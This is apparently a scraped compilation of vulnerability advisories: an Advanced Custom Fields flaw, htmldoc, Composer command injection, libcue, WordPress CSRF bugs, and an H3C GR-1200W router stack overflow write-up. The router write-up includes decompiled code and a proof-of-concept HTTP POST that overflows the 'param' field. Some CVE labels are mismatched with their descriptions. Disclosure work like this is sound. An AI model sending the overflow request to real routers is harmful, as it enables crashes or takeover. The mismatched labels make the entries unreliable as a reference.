Advanced Custom Fields versions prior to 5.11 and Advanced Custom Fields Pro versions prior to 5.11 contain a missing authorization vulnerability in moving the field group which may allow a user to move the unauthorized field group via unspecified vectors.

CVE-2021-20867: Advanced Custom Fields

A flaw was found in htmldoc in v1.9.12 and before. Null pointer dereference in file_extension(),in file.c may lead to execute arbitrary code and denial of service.

Published: **3 June 2021**

\[Unknown description\]

**Status**

Package

Release

Status

htmldoc  
Launchpad, Ubuntu, Debian

bionic

Not vulnerable  

focal

Released (1.9.7-1ubuntu0.2)  

groovy

Ignored (reached end-of-life)  

hirsute

Released (1.9.11-2ubuntu0.1)  

impish

Not vulnerable (1.9.11-4)  

trusty

Does not exist  

upstream

Released (1.9.11-4)  

xenial

Ignored (out of standard support)  

**References**

*   https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23180
*   https://github.com/michaelrsweet/htmldoc/issues/418
*   https://github.com/michaelrsweet/htmldoc/commit/19c582fb32eac74b57e155cffbb529377a9e751a
*   https://ubuntu.com/security/notices/USN-5198-1
*   NVD
*   Launchpad
*   Debian

**Bugs**

*   http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=989437

CVE-2021-23180: CVE-2021-23180 | Ubuntu

### Impact

The `status`, `reinstall` and `remove` commands with packages installed from source via git containing specially crafted branch names in the repository can be used to execute code.

### Patches

2.2.24 for 2.2 LTS or 2.7.7 for mainline

### Workarounds

Avoid installing dependencies via git by using `--prefer-dist` or the `preferred-install: dist` config setting.


1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2024-35241

**Composer has a command injection via malicious git branch name**

High severity GitHub Reviewed Published Jun 10, 2024 in composer/composer • Updated Jun 10, 2024

**Package**

composer composer/composer (Composer)

**Affected versions**

\>= 2.0, < 2.2.24

\>= 2.3, < 2.7.7

**Patched versions**

2.2.24

2.7.7

**Impact**

The status, reinstall and remove commands with packages installed from source via git containing specially crafted branch names in the repository can be used to execute code.

**Patches**

2.2.24 for 2.2 LTS or 2.7.7 for mainline

**Workarounds**

Avoid installing dependencies via git by using --prefer-dist or the preferred-install: dist config setting.

**References**

*   GHSA-47f6-5gq3-vx9c
*   composer/composer@b93fc6c
*   composer/composer@ee28354

Published to the GitHub Advisory Database

Jun 10, 2024

Last updated

Jun 10, 2024

GHSA-47f6-5gq3-vx9c: Composer has a command injection via malicious git branch name

H3C GR-1200W MiniGRW1A0V100R006 was discovered to contain a stack overflow via the function version_set.

Permalink

**Affected product**

    H3C GR-1200W  MiniGRW1A0V100R006
    

**Firmware**

    https://www.h3c.com/cn/d_202102/1383837_30005_0.htm
    

In function sub\_4ACC30,the content obtained by the program from the parameter "param" is passed to v2 .Then the v2 is directly copied into the v3 stack through the strcpy function. There is no size check, so there is a stack overflow vulnerability.The attacker can easily perform a Deny of Service Attack or Remote Code Execution with carefully crafted overflow data.

**Detail**

int \_\_fastcall sub\_4ACC30(int a1)
{
  const char \*v2; // \[sp+28h\] \[+28h\]
  int v3\[9\]; // \[sp+2Ch\] \[+2Ch\] BYREF

  v3\[0\] = 0;
  v3\[1\] = 0;
  v3\[2\] = 0;
  v3\[3\] = 0;
  v3\[4\] = 0;
  v3\[5\] = 0;
  v3\[6\] = 0;
  v3\[7\] = 0;
  v2 = (const char \*)sub\_4E58C8(a1, "param", &unk\_4FFD30);
  strcpy((char \*)v3, v2);
  CFG\_Set(0, 505155584, v3);
  return 0;
}

**POC**

POST /goform/aspForm HTTP/1.1
Host: 192.168.0.11:80
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,\*/\*;q\=0.8
Accept\-Language: zh\-CN,zh;q\=0.8,zh\-TW;q\=0.7,zh\-HK;q\=0.5,en\-US;q\=0.3,en;q\=0.2
Accept\-Encoding: gzip, deflate
Referer: https://121.226.152.63:8443/router\_password\_mobile.asp
Content\-Type: application/x\-www\-form\-urlencoded
Content\-Length: 553
Origin: https://192.168.0.124:80
DNT: 1
Connection: close
Cookie: JSESSIONID\=5c31d502
Upgrade\-Insecure\-Requests: 1
Sec\-Fetch\-Dest: document
Sec\-Fetch\-Mode: navigate
Sec\-Fetch\-Site: same\-origin
Sec\-Fetch\-User: ?1

CMD\=version\_set&param\=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,;

You can see the router crash, and finally we can write an exp to get a root shell

CVE-2023-29696: fengsha/aVersionSet.md at main · Stevenbaga/fengsha

Gentoo Linux Security Advisory 202310-10 - A vulnerability has been discovered in libcue which could allow for arbitrary code execution. Versions greater than or equal to 2.2.1-r1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202310-10  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: libcue: Arbitrary Code Execution  
     Date: October 10, 2023  
     Bugs: #915500  
       ID: 202310-10

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been discovered in libcue which could allow for  
arbitrary code execution.

Background  
==========

libcue is a CUE Sheet Parser Library.

Affected packages  
=================

Package            Vulnerable    Unaffected  
-----------------  ------------  ------------  
media-libs/libcue  < 2.2.1-r1    >= 2.2.1-r1

Description  
===========

libcue does not check bounds in a loop and suffers from an integer  
overflow flaw which can be exploited to take over the program.

Impact  
======

Untrusted CUE sheet files can lead to arbitrary code execution.

app-misc/tracker-miners[cue] uses libcue to index CUE Sheet files in  
directories. It is possible that downloading a malicious CUE Sheet file  
into a directory indexed by tracker-miners could lead to remote code  
execution.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All libcue users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=media-libs/libcue-2.2.1-r1"

References  
==========

[ 1 ] CVE-2023-43641  
      https://nvd.nist.gov/vuln/detail/CVE-2023-43641

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202310-10

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202310-10

CVE-2021-1928

CVE-2021-1916

The New User Email Set Up WordPress plugin through 0.5.2 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack

CVE-2022-1790

The Private Files WordPress plugin through 0.40 is missing CSRF check when disabling the protection, which could allow attackers to make a logged in admin perform such action via a CSRF attack and make the blog public

CVE-2022-1793

The Rename wp-login.php WordPress plugin through 2.6.0 does not have CSRF check in place when updating the secret login URL, which could allow attackers to make a logged in admin change them via a CSRF attack

Search

lenovo warranty check/lookup | check warranty status | lenovo support us